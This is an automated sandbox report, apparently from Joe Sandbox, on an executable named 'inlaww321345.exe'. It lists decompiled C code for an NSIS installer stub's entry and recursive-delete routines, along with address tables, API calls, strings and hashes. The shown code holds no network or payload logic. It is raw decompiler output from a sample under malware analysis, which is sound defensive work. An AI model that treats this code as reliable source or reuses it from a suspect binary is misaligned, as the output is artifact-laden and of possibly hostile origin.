132->109 140->129
                    C-Code - Quality: 78%
                    			_entry_() {
				WCHAR* _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				int _v24;
				int _v28;
				struct _TOKEN_PRIVILEGES _v40;
				signed char _v42;
				int _v44;
				signed int _v48;
				intOrPtr _v278;
				signed short _v310;
				struct _OSVERSIONINFOW _v324;
				struct _SHFILEINFOW _v1016;
				intOrPtr* _t88;
				WCHAR* _t92;
				char* _t94;
				void _t97;
				void* _t116;
				WCHAR* _t118;
				signed int _t119;
				intOrPtr* _t123;
				void* _t137;
				void* _t143;
				void* _t148;
				void* _t152;
				void* _t157;
				signed int _t167;
				void* _t170;
				void* _t175;
				intOrPtr _t177;
				intOrPtr _t178;
				intOrPtr* _t179;
				int _t188;
				void* _t189;
				void* _t198;
				signed int _t204;
				signed int _t209;
				signed int _t214;
				signed int _t216;
				int* _t218;
				signed int _t226;
				signed int _t229;
				CHAR* _t231;
				char* _t232;
				signed int _t233;
				WCHAR* _t234;
				void* _t250;

				_t216 = 0x20;
				_t188 = 0;
				_v24 = 0;
				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
				_v20 = 0;
				SetErrorMode(0x8001); // executed
				_v324.szCSDVersion = 0;
				_v48 = 0;
				_v44 = 0;
				_v324.dwOSVersionInfoSize = 0x11c;
				if(GetVersionExW( &_v324) == 0) {
					_v324.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v324);
					asm("sbb eax, eax");
					_v42 = 4;
					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
				}
				if(_v324.dwMajorVersion < 0xa) {
					_v310 = _v310 & 0x00000000;
				}
				 *0x7a8b58 = _v324.dwBuildNumber;
				 *0x7a8b5c = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
				if( *0x7a8b5e != 0x600) {
					_t179 = E00406A3B(_t188);
					if(_t179 != _t188) {
						 *_t179(0xc00);
					}
				}
				_t231 = "UXTHEME";
				do {
					E004069CB(_t231); // executed
					_t231 =  &(_t231[lstrlenA(_t231) + 1]);
				} while ( *_t231 != 0);
				E00406A3B(0xb);
				 *0x7a8aa4 = E00406A3B(9);
				_t88 = E00406A3B(7);
				if(_t88 != _t188) {
					_t88 =  *_t88(0x1e);
					if(_t88 != 0) {
						 *0x7a8b5c =  *0x7a8b5c | 0x00000080;
					}
				}
				__imp__#17();
				__imp__OleInitialize(_t188); // executed
				 *0x7a8b60 = _t88;
				SHGetFileInfoW(0x79ff48, _t188,  &_v1016, 0x2b4, _t188); // executed
				E0040666E(0x7a7aa0, L"NSIS Error");
				_t92 = GetCommandLineW();
				_t232 = L"\"C:\\Users\\hardz\\Desktop\\inlaww321345.exe\" ";
				E0040666E(_t232, _t92);
				_t94 = _t232;
				_t233 = 0x22;
				 *0x7a8aa0 = 0x400000;
				_t250 = L"\"C:\\Users\\hardz\\Desktop\\inlaww321345.exe\" " - _t233; // 0x22
				if(_t250 == 0) {
					_t216 = _t233;
					_t94 =  &M007B3002;
				}
				_t198 = CharNextW(E00405F6A(_t94, _t216));
				_v16 = _t198;
				while(1) {
					_t97 =  *_t198;
					_t251 = _t97 - _t188;
					if(_t97 == _t188) {
						break;
					}
					_t209 = 0x20;
					__eflags = _t97 - _t209;
					if(_t97 != _t209) {
						L17:
						__eflags =  *_t198 - _t233;
						_v12 = _t209;
						if( *_t198 == _t233) {
							_v12 = _t233;
							_t198 = _t198 + 2;
							__eflags = _t198;
						}
						__eflags =  *_t198 - 0x2f;
						if( *_t198 != 0x2f) {
							L32:
							_t198 = E00405F6A(_t198, _v12);
							__eflags =  *_t198 - _t233;
							if(__eflags == 0) {
								_t198 = _t198 + 2;
								__eflags = _t198;
							}
							continue;
						} else {
							_t198 = _t198 + 2;
							__eflags =  *_t198 - 0x53;
							if( *_t198 != 0x53) {
								L24:
								asm("cdq");
								asm("cdq");
								_t214 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t226 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t214;
								__eflags =  *_t198 - (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214);
								if( *_t198 != (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214)) {
									L29:
									asm("cdq");
									asm("cdq");
									_t209 = L" /D=" & 0x0000ffff;
									asm("cdq");
									_t229 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t209;
									__eflags =  *(_t198 - 4) - (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209);
									if( *(_t198 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209)) {
										L31:
										_t233 = 0x22;
										goto L32;
									}
									__eflags =  *_t198 - _t229;
									if( *_t198 == _t229) {
										 *(_t198 - 4) = _t188;
										__eflags = _t198;
										E0040666E(L"C:\\Users\\hardz\\AppData\\Local\\Temp", _t198);
										L37:
										_t234 = L"C:\\Users\\hardz\\AppData\\Local\\Temp\\";
										GetTempPathW(0x400, _t234);
										_t116 = E00403615(_t198, _t251);
										_t252 = _t116;
										if(_t116 != 0) {
											L40:
											DeleteFileW(L"1033"); // executed
											_t118 = E004030D0(_t254, _v20); // executed
											_v8 = _t118;
											if(_t118 != _t188) {
												L68:
												ExitProcess(); // executed
												__imp__OleUninitialize(); // executed
												if(_v8 == _t188) {
													if( *0x7a8b34 == _t188) {
														L77:
														_t119 =  *0x7a8b4c;
														if(_t119 != 0xffffffff) {
															_v24 = _t119;
														}
														ExitProcess(_v24);
													}
													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
														LookupPrivilegeValueW(_t188, L"SeShutdownPrivilege",  &(_v40.Privileges));
														_v40.PrivilegeCount = 1;
														_v28 = 2;
														AdjustTokenPrivileges(_v16, _t188,  &_v40, _t188, _t188, _t188);
													}
													_t123 = E00406A3B(4);
													if(_t123 == _t188) {
														L75:
														if(ExitWindowsEx(2, 0x80040002) != 0) {
															goto L77;
														}
														goto L76;
													} else {
														_push(0x80040002);
														_push(0x25);
														_push(_t188);
														_push(_t188);
														_push(_t188);
														if( *_t123() == 0) {
															L76:
															E0040140B(9);
															goto L77;
														}
														goto L75;
													}
												}
												E00405CCE(_v8, 0x200010);
												ExitProcess(2);
											}
											if( *0x7a8abc == _t188) {
												L51:
												 *0x7a8b4c =  *0x7a8b4c | 0xffffffff;
												_v24 = E00403D1D(_t264);
												goto L68;
											}
											_t218 = E00405F6A(L"\"C:\\Users\\hardz\\Desktop\\inlaww321345.exe\" ", _t188);
											if(_t218 < L"\"C:\\Users\\hardz\\Desktop\\inlaww321345.exe\" ") {
												L48:
												_t263 = _t218 - L"\"C:\\Users\\hardz\\Desktop\\inlaww321345.exe\" ";
												_v8 = L"Error launching installer";
												if(_t218 < L"\"C:\\Users\\hardz\\Desktop\\inlaww321345.exe\" ") {
													_t189 = E00405C39(__eflags);
													lstrcatW(_t234, L"~nsu");
													__eflags = _t189;
													if(_t189 != 0) {
														lstrcatW(_t234, "A");
													}
													lstrcatW(_t234, L".tmp");
													_t137 = lstrcmpiW(_t234, 0x7b4800);
													__eflags = _t137;
													if(_t137 == 0) {
														L67:
														_t188 = 0;
														__eflags = 0;
														goto L68;
													} else {
														__eflags = _t189;
														_push(_t234);
														if(_t189 == 0) {
															E00405C1C();
														} else {
															E00405B9F();
														}
														SetCurrentDirectoryW(_t234);
														__eflags = L"C:\\Users\\hardz\\AppData\\Local\\Temp"; // 0x43
														if(__eflags == 0) {
															E0040666E(L"C:\\Users\\hardz\\AppData\\Local\\Temp", 0x7b4800);
														}
														E0040666E(0x7a9000, _v16);
														_t201 = "A" & 0x0000ffff;
														_t143 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
														__eflags = _t143;
														_v12 = 0x1a;
														 *0x7a9800 = _t143;
														do {
															E004066AB(0, 0x79f748, _t234, 0x79f748,  *((intOrPtr*)( *0x7a8ab0 + 0x120)));
															DeleteFileW(0x79f748);
															__eflags = _v8;
															if(_v8 != 0) {
																_t148 = CopyFileW(L"C:\\Users\\hardz\\Desktop\\inlaww321345.exe", 0x79f748, 1);
																__eflags = _t148;
																if(_t148 != 0) {
																	E0040642E(_t201, 0x79f748, 0);
																	E004066AB(0, 0x79f748, _t234, 0x79f748,  *((intOrPtr*)( *0x7a8ab0 + 0x124)));
																	_t152 = E00405C51(0x79f748);
																	__eflags = _t152;
																	if(_t152 != 0) {
																		CloseHandle(_t152);
																		_v8 = 0;
																	}
																}
															}
															 *0x7a9800 =  *0x7a9800 + 1;
															_t61 =  &_v12;
															 *_t61 = _v12 - 1;
															__eflags =  *_t61;
														} while ( *_t61 != 0);
														E0040642E(_t201, _t234, 0);
														goto L67;
													}
												}
												 *_t218 = _t188;
												_t221 =  &(_t218[2]);
												_t157 = E00406045(_t263,  &(_t218[2]));
												_t264 = _t157;
												if(_t157 == 0) {
													goto L68;
												}
												E0040666E(L"C:\\Users\\hardz\\AppData\\Local\\Temp", _t221);
												E0040666E(0x7b4000, _t221);
												_v8 = _t188;
												goto L51;
											}
											asm("cdq");
											asm("cdq");
											asm("cdq");
											_t204 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
											_t167 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t209 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
											while( *_t218 != _t204 || _t218[1] != _t167) {
												_t218 = _t218;
												if(_t218 >= L"\"C:\\Users\\hardz\\Desktop\\inlaww321345.exe\" ") {
													continue;
												}
												break;
											}
											_t188 = 0;
											goto L48;
										}
										GetWindowsDirectoryW(_t234, 0x3fb);
										lstrcatW(_t234, L"\\Temp");
										_t170 = E00403615(_t198, _t252);
										_t253 = _t170;
										if(_t170 != 0) {
											goto L40;
										}
										GetTempPathW(0x3fc, _t234);
										lstrcatW(_t234, L"Low");
										SetEnvironmentVariableW(L"TEMP", _t234);
										SetEnvironmentVariableW(L"TMP", _t234);
										_t175 = E00403615(_t198, _t253);
										_t254 = _t175;
										if(_t175 == 0) {
											goto L68;
										}
										goto L40;
									}
									goto L31;
								}
								__eflags =  *((intOrPtr*)(_t198 + 4)) - _t226;
								if( *((intOrPtr*)(_t198 + 4)) != _t226) {
									goto L29;
								}
								_t177 =  *((intOrPtr*)(_t198 + 8));
								__eflags = _t177 - 0x20;
								if(_t177 == 0x20) {
									L28:
									_t36 =  &_v20;
									 *_t36 = _v20 | 0x00000004;
									__eflags =  *_t36;
									goto L29;
								}
								__eflags = _t177 - _t188;
								if(_t177 != _t188) {
									goto L29;
								}
								goto L28;
							}
							_t178 =  *((intOrPtr*)(_t198 + 2));
							__eflags = _t178 - _t209;
							if(_t178 == _t209) {
								L23:
								 *0x7a8b40 = 1;
								goto L24;
							}
							__eflags = _t178 - _t188;
							if(_t178 != _t188) {
								goto L24;
							}
							goto L23;
						}
					} else {
						goto L16;
					}
					do {
						L16:
						_t198 = _t198 + 2;
						__eflags =  *_t198 - _t209;
					} while ( *_t198 == _t209);
					goto L17;
				}
				goto L37;
			}



















































                    0x00403654
                    0x00403655
                    0x0040365c
                    0x0040365f
                    0x00403666
                    0x00403669
                    0x0040367c
                    0x00403682
                    0x00403685
                    0x00403688
                    0x00403696
                    0x0040369e
                    0x004036a9
                    0x004036c2
                    0x004036c4
                    0x004036cc
                    0x004036cc
                    0x004036d7
                    0x004036d9
                    0x004036d9
                    0x004036ee
                    0x00403713
                    0x00403721
                    0x00403724
                    0x0040372b
                    0x00403732
                    0x00403732
                    0x0040372b
                    0x00403734
                    0x00403739
                    0x0040373a
                    0x00403746
                    0x0040374a
                    0x00403751
                    0x0040375f
                    0x00403764
                    0x0040376b
                    0x0040376f
                    0x00403773
                    0x00403775
                    0x00403775
                    0x00403773
                    0x0040377c
                    0x00403783
                    0x00403789
                    0x004037a1
                    0x004037b1
                    0x004037b6
                    0x004037bc
                    0x004037c3
                    0x004037ca
                    0x004037cc
                    0x004037cd
                    0x004037d7
                    0x004037de
                    0x004037e0
                    0x004037e2
                    0x004037e2
                    0x004037f5
                    0x004037f7
                    0x004038f1
                    0x004038f1
                    0x004038f4
                    0x004038f7
                    0x00000000
                    0x00000000
                    0x00403801
                    0x00403802
                    0x00403805
                    0x0040380e
                    0x0040380e
                    0x00403811
                    0x00403814
                    0x00403817
                    0x0040381a
                    0x0040381a
                    0x0040381a
                    0x0040381b
                    0x0040381f
                    0x004038df
                    0x004038e8
                    0x004038ea
                    0x004038ed
                    0x004038f0
                    0x004038f0
                    0x004038f0
                    0x00000000
                    0x00403825
                    0x00403826
                    0x00403827
                    0x0040382b
                    0x00403845
                    0x0040384c
                    0x0040385f
                    0x00403860
                    0x00403875
                    0x0040387a
                    0x0040387c
                    0x0040387e
                    0x0040389a
                    0x004038a1
                    0x004038b4
                    0x004038b5
                    0x004038ca
                    0x004038d0
                    0x004038d2
                    0x004038d4
                    0x004038dc
                    0x004038de
                    0x00000000
                    0x004038de
                    0x004038d8
                    0x004038da
                    0x004038ff
                    0x00403903
                    0x0040390c
                    0x00403911
                    0x00403917
                    0x00403922
                    0x00403924
                    0x00403929
                    0x0040392b
                    0x00403983
                    0x00403988
                    0x00403991
                    0x00403998
                    0x0040399b
                    0x00403b72
                    0x00403b72
                    0x00403b77
                    0x00403b80
                    0x00403b9d
                    0x00403c15
                    0x00403c15
                    0x00403c1d
                    0x00403c1f
                    0x00403c1f
                    0x00403c25
                    0x00403c25
                    0x00403bb4
                    0x00403bc0
                    0x00403bd1
                    0x00403bd8
                    0x00403bdf
                    0x00403bdf
                    0x00403be7
                    0x00403bf3
                    0x00403c01
                    0x00403c0c
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00403bf5
                    0x00403bf5
                    0x00403bf6
                    0x00403bf8
                    0x00403bf9
                    0x00403bfa
                    0x00403bff
                    0x00403c0e
                    0x00403c10
                    0x00000000
                    0x00403c10
                    0x00000000
                    0x00403bff
                    0x00403bf3
                    0x00403b8a
                    0x00403b91
                    0x00403b91
                    0x004039a7
                    0x00403a4e
                    0x00403a4e
                    0x00403a5a
                    0x00000000
                    0x00403a5a
                    0x004039b8
                    0x004039c0
                    0x00403a12
                    0x00403a12
                    0x00403a18
                    0x00403a1f
                    0x00403a6d
                    0x00403a6f
                    0x00403a74
                    0x00403a76
                    0x00403a7e
                    0x00403a7e
                    0x00403a89
                    0x00403a95
                    0x00403a9b
                    0x00403a9d
                    0x00403b70
                    0x00403b70
                    0x00403b70
                    0x00000000
                    0x00403aa3
                    0x00403aa3
                    0x00403aa5
                    0x00403aa6
                    0x00403aaf
                    0x00403aa8
                    0x00403aa8
                    0x00403aa8
                    0x00403ab5
                    0x00403abd
                    0x00403ac4
                    0x00403acc
                    0x00403acc
                    0x00403ad9
                    0x00403ae5
                    0x00403aef
                    0x00403aef
                    0x00403af1
                    0x00403af8
                    0x00403b02
                    0x00403b0e
                    0x00403b14
                    0x00403b1a
                    0x00403b1d
                    0x00403b27
                    0x00403b2d
                    0x00403b2f
                    0x00403b33
                    0x00403b44
                    0x00403b4a
                    0x00403b4f
                    0x00403b51
                    0x00403b54
                    0x00403b5a
                    0x00403b5a
                    0x00403b51
                    0x00403b2f
                    0x00403b5d
                    0x00403b64
                    0x00403b64
                    0x00403b64
                    0x00403b64
                    0x00403b6b
                    0x00000000
                    0x00403b6b
                    0x00403a9d
                    0x00403a21
                    0x00403a24
                    0x00403a28
                    0x00403a2d
                    0x00403a2f
                    0x00000000
                    0x00000000
                    0x00403a3b
                    0x00403a46
                    0x00403a4b
                    0x00000000
                    0x00403a4b
                    0x004039c9
                    0x004039e1
                    0x004039f2
                    0x004039f3
                    0x004039f7
                    0x004039f9
                    0x00403a07
                    0x00403a0e
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00403a0e
                    0x00403a10
                    0x00000000
                    0x00403a10
                    0x00403933
                    0x0040393f
                    0x00403944
                    0x00403949
                    0x0040394b
                    0x00000000
                    0x00000000
                    0x00403953
                    0x0040395b
                    0x0040396c
                    0x00403974
                    0x00403976
                    0x0040397b
                    0x0040397d
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040397d
                    0x00000000
                    0x004038da
                    0x00403883
                    0x00403885
                    0x00000000
                    0x00000000
                    0x00403887
                    0x0040388b
                    0x0040388f
                    0x00403896
                    0x00403896
                    0x00403896
                    0x00403896
                    0x00000000
                    0x00403896
                    0x00403891
                    0x00403894
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00403894
                    0x0040382d
                    0x00403831
                    0x00403834
                    0x0040383b
                    0x0040383b
                    0x00000000
                    0x0040383b
                    0x00403836
                    0x00403839
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00403839
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00403807
                    0x00403807
                    0x00403808
                    0x00403809
                    0x00403809
                    0x00000000
                    0x00403807
                    0x00000000

                    APIs
                    • SetErrorMode.KERNELBASE(00008001), ref: 00403669
                    • GetVersionExW.KERNEL32(?), ref: 00403692
                    • GetVersionExW.KERNEL32(0000011C), ref: 004036A9
                    • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403740
                    • #17.COMCTL32(00000007,00000009,0000000B), ref: 0040377C
                    • OleInitialize.OLE32(00000000), ref: 00403783
                    • SHGetFileInfoW.SHELL32(0079FF48,00000000,?,000002B4,00000000), ref: 004037A1
                    • GetCommandLineW.KERNEL32(007A7AA0,NSIS Error), ref: 004037B6
                    • CharNextW.USER32(00000000,"C:\Users\user\Desktop\inlaww321345.exe" ,00000020,"C:\Users\user\Desktop\inlaww321345.exe" ,00000000), ref: 004037EF
                    • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 00403922
                    • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403933
                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040393F
                    • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403953
                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040395B
                    • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040396C
                    • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403974
                    • DeleteFileW.KERNELBASE(1033), ref: 00403988
                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403A6F
                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 00403A7E
                      • Part of subcall function 00405C1C: CreateDirectoryW.KERNELBASE(?,00000000,00403639,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00405C22
                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403A89
                    • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,007B4800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\inlaww321345.exe" ,00000000,?), ref: 00403A95
                    • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403AB5
                    • DeleteFileW.KERNEL32(0079F748,0079F748,?,007A9000,?), ref: 00403B14
                    • CopyFileW.KERNEL32(C:\Users\user\Desktop\inlaww321345.exe,0079F748,00000001), ref: 00403B27
                    • CloseHandle.KERNEL32(00000000,0079F748,0079F748,?,0079F748,00000000), ref: 00403B54
                    • ExitProcess.KERNEL32(?), ref: 00403B72
                    • OleUninitialize.OLE32(?), ref: 00403B77
                    • ExitProcess.KERNEL32 ref: 00403B91
                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403BA5
                    • OpenProcessToken.ADVAPI32(00000000), ref: 00403BAC
                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BC0
                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403BDF
                    • ExitWindowsEx.USER32(00000002,80040002), ref: 00403C04
                    • ExitProcess.KERNEL32 ref: 00403C25
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.260734428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260747957.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260784814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260791797.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261016633.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261025813.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261032739.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261051766.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261058159.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261063898.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261068161.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: Processlstrcat$ExitFile$Directory$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                    • String ID: "C:\Users\user\Desktop\inlaww321345.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\inlaww321345.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                    • API String ID: 2292928366-928328702
                    • Opcode ID: 750da170c5ec3071fbc253d64d945ba09a8a0fe5a141c473f87f6f160000b61b
                    • Instruction ID: 9002a92140da6a8b371a97510ecbbb4cdf1836846ed801e4a5207059f252ac0c
                    • Opcode Fuzzy Hash: 750da170c5ec3071fbc253d64d945ba09a8a0fe5a141c473f87f6f160000b61b
                    • Instruction Fuzzy Hash: EAE13571A00214AAD720AFB58D45BAF7EB9EB45709F10843EF541B62D1DB7C8E41CB2D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00405D7A Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 390 405d7a-405da0 call 406045 393 405da2-405db4 DeleteFileW 390->393 394 405db9-405dc0 390->394 395 405f36-405f3a 393->395 396 405dc2-405dc4 394->396 397 405dd3-405de3 call 40666e 394->397 399 405ee4-405ee9 396->399 400 405dca-405dcd 396->400 403 405df2-405df3 call 405f89 397->403 404 405de5-405df0 lstrcatW 397->404 399->395 402 405eeb-405eee 399->402 400->397 400->399 405 405ef0-405ef6 402->405 406 405ef8-405f00 call 4069a4 402->406 407 405df8-405dfc 403->407 404->407 405->395 406->395 414 405f02-405f16 call 405f3d call 405d32 406->414 410 405e08-405e0e lstrcatW 407->410 411 405dfe-405e06 407->411 413 405e13-405e2f lstrlenW FindFirstFileW 410->413 411->410 411->413 415 405e35-405e3d 413->415 416 405ed9-405edd 413->416 432 405f18-405f1b 414->432 433 405f2e-405f31 call 4056d0 414->433 419 405e5d-405e71 call 40666e 415->419 420 405e3f-405e47 415->420 416->399 418 405edf 416->418 418->399 430 405e73-405e7b 419->430 431 405e88-405e93 call 405d32 419->431 422 405e49-405e51 420->422 423 405ebc-405ecc FindNextFileW 420->423 422->419 427 405e53-405e5b 422->427 423->415 426 405ed2-405ed3 FindClose 423->426 426->416 427->419 427->423 430->423 435 405e7d-405e86 call 405d7a 430->435 443 405eb4-405eb7 call 4056d0 431->443 444 405e95-405e98 431->444 432->405 434 405f1d-405f2c call 4056d0 call 40642e 432->434 433->395 434->395 435->423 443->423 446 405e9a-405eaa call 4056d0 call 40642e 444->446 447 405eac-405eb2 444->447 446->423 447->423
                    C-Code - Quality: 98%
                    			E00405D7A(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E00406045(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x7a8b28 =  *0x7a8b28 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E0040666E(0x7a3f90, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405F89(_t68);
					} else {
						lstrcatW(0x7a3f90, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x7a3f90,  &_v604); // executed
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E0040666E(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405D32(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E004056D0(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x7a8b28 =  *0x7a8b28 + 1;
										} else {
											E004056D0(0xfffffff1, _t68);
											E0040642E(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405D7A(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604); // executed
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70); // executed
						goto L26;
					}
					__eflags =  *0x7a3f90 - 0x5c;
					if( *0x7a3f90 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E004069A4(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405F3D(_t68);
							_t38 = E00405D32(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E004056D0(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E004056D0(0xfffffff1, _t68);
							return E0040642E(_t67, _t68, 0);
						}
						L30:
						 *0x7a8b28 =  *0x7a8b28 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}


















                    0x00405d84
                    0x00405d89
                    0x00405d92
                    0x00405d95
                    0x00405d9d
                    0x00405da0
                    0x00405da3
                    0x00405dab
                    0x00405dad
                    0x00405dae
                    0x00000000
                    0x00405dae
                    0x00405db9
                    0x00405dbc
                    0x00405dbc
                    0x00405dbc
                    0x00405dc0
                    0x00405dd3
                    0x00405dda
                    0x00405ddf
                    0x00405de3
                    0x00405df3
                    0x00405de5
                    0x00405deb
                    0x00405deb
                    0x00405df8
                    0x00405dfc
                    0x00405e08
                    0x00405e0e
                    0x00405e13
                    0x00405e19
                    0x00405e24
                    0x00405e2a
                    0x00405e2c
                    0x00405e2f
                    0x00405ed9
                    0x00405ed9
                    0x00405edd
                    0x00405edf
                    0x00405edf
                    0x00405edf
                    0x00405edf
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00405e35
                    0x00405e35
                    0x00405e35
